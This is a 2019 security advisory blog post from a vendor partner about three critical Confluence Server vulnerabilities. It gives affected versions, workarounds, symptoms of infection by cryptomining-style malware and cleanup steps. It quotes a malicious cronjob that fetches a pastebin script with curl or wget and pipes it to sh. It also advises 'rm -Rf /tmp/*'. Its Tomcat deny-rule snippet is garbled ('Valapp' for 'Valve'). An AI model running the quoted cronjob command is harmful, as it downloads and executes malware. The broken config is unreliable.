Thu, 04/18/2019 - 07:38
Example Screenshot

In March, Atlassian announced that the knowledge base/document collaboration tool Confluence (server and data center) contained two critical vulnerabilities, the apps WebDAV and Widget Connector. On April 17th another critical security vulnerability was detected in Confluence. Unfortunately, many other Solution Partners as well as us have over past few days become aware of that this vulnerability is actively exploited by hackers to attack publicly reachable Confluence instances. In order to protect yourself from such attacks, Atlassian recommends to upgrade to the latest Confluence versions.

In the following we will provide you with more detailed information about the effects of these security vulnerabilities, what they can cause and how to proceed to recover from these kind of attacks by hackers.

 

About the Security vulnerabilities

WebDAV vulnerability - CVE-2019-3395

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center versions released before the 18th June 2018 are vulnerable to this issue. A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x).

Widget Connector vulnerability - CVE-2019-3396

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

There was an server-side template injection vulnerability in Confluence Server and Data Center, in the Widget Connector. An attacker is able to exploit this issue to achieve server-side template injection, path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x) and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x).

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.

More Details

Secure your instance!

First of all: Please make sure to upgrade your Confluence instance to the latest version! This is the best way to protect yourself from these kind of cyber attacks.

If you have chosen an enterprise version of Confluence, you only need to select the last minor update. If you do not have an enterprise version and do not have either of the last two versions, you will have to upgrade to the latest version.

If this is not possible due to other reasons, you need to secure your instance ASAP. Here is how to proceed:

Mitigation for CVE-2019-3396

If you unable to update Confluence immediately, you can switch to the following link as a temporary workaround.  Settings > Manage apps / add-ons select System, and disable the following system plugins in Confluence:

If you disable the Widget Connector plugin, the Widget Connector macro will not be available anymore. This macro is used to display content from websites like YouTube, Vimeo, and Twitter. Users will see an 'unknown macro' error.

If you disable the WebDAV plugin, you will not be able to connect to Confluence using a WebDAV client. Disabling this plugin will also automatically disable the Office Connector plugin, which means Office Connector features, such as "Import from Word" and "Edit in Office" are no longer available. Please be aware that since WebDAV is not required to edit files from Confluence 6.11 and later, it is still possible to edit files in these versions.

After upgrading, you will need to manually re-enable:

  • WebDAV plugin
  • Widget Connector
  • WebDAV plugin
  • Widget Connector
  • Office Connector.

 

Mitigation for CVE-2019-3398

If you are unable to upgrade Confluence immediately, as a temporary workaround, you should block the affected URL <base-url>/<context-path>/pages/downloadallattachments.action . Disabling this URL will prevent anyone downloading all attachments via the attachments page or the attachments macro. Downloading individual attachments will continue tol work.

To block the URL directly in Tomcat:

  1. Stop Confluence.
  2. Edit <install-directory>/conf/server.xml.
  3. Add the following inside the <Host> element:

    <Context path="/pages/downloadallattachments.action" docBase="" > <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" /> </Context>

    If you run Confluence with a context path, for example /wiki, you will need to include your context path in the path, as shown here:

    <Context path="/wiki/pages/downloadallattachments.action" docBase="" > <Valapp className="org.apache.catalina.valapps.RemoteAddrValapp" deny="*" /> </Context>

  4. Save the file, and restart Confluence.

To verify that the workaround was applied correctly:

  1. Navigate to a page or blog that has 2 or more attachments.
  2. Go to > Attachments and then select Download all attachments.

You should see a 404 error and no files should be downloaded.

 

Already infected?

We are currently aware of the following effects caused by exploiting the security vulnerabilities:

  1. The instance is unreachable
  2. Unable to start the instance → process will be killed after a few seconds
  3. Heavy CPU load of processed data executed by the Confluence user in peculiar process such as (sshd, khugepaged, vmlinuz)

Example of htop

If your instance shows these or similar symptoms, you may also have been attacked and exploited by this malware. Currently we observed this type of malware attack on Linux systems only. Different files will be created within the /tmp folder. One of these files is called seasame (Located in /tmp/seasame), which is the malware itself. This basically means, that the malware attempts to install itself as a service, register a cronjob and run the maleware itself. This description is based on our current analyses but there may be various other variants out there to exploit the security vulnerabilities.

How to resolve this issue if you are affected?

The following step is a workaround. You should install a new server and just copy the database and the folder Confluence-data. If this is currently not possible, try the following:

  1. Kill the processes
  2. Clean /tmp folder e.g. rm -Rf /tmp/*
  3. (Optional) Delete the Confluence user (This will prevent the malware to be executed)
  4. Check cronjobs for the malware (In addition you might want to check for a modified noop.jsp)

    There might be en entry like this:

    ```*/15 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi%7C%7Cwget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh```

  5. Install the latest version of Confluence
  6. (Optional) If the Confluence user was deleted in step 3, create a new one with a different name.

 

Please feel free to contact venITure, if you have any questions regarding this issue or if you need any type of technical support in this matter. (service@venITure.net or +49 221 985 9240)

 

Add new comment

Restricted HTML

  • Allowed HTML tags: <a href hreflang> <em> <strong> <cite> <blockquote cite> <code> <ul type> <ol start type> <li> <dl> <dt> <dd> <h2 id> <h3 id> <h4 id> <h5 id> <h6 id>
  • Lines and paragraphs break automatically.
  • Web page addresses and email addresses turn into links automatically.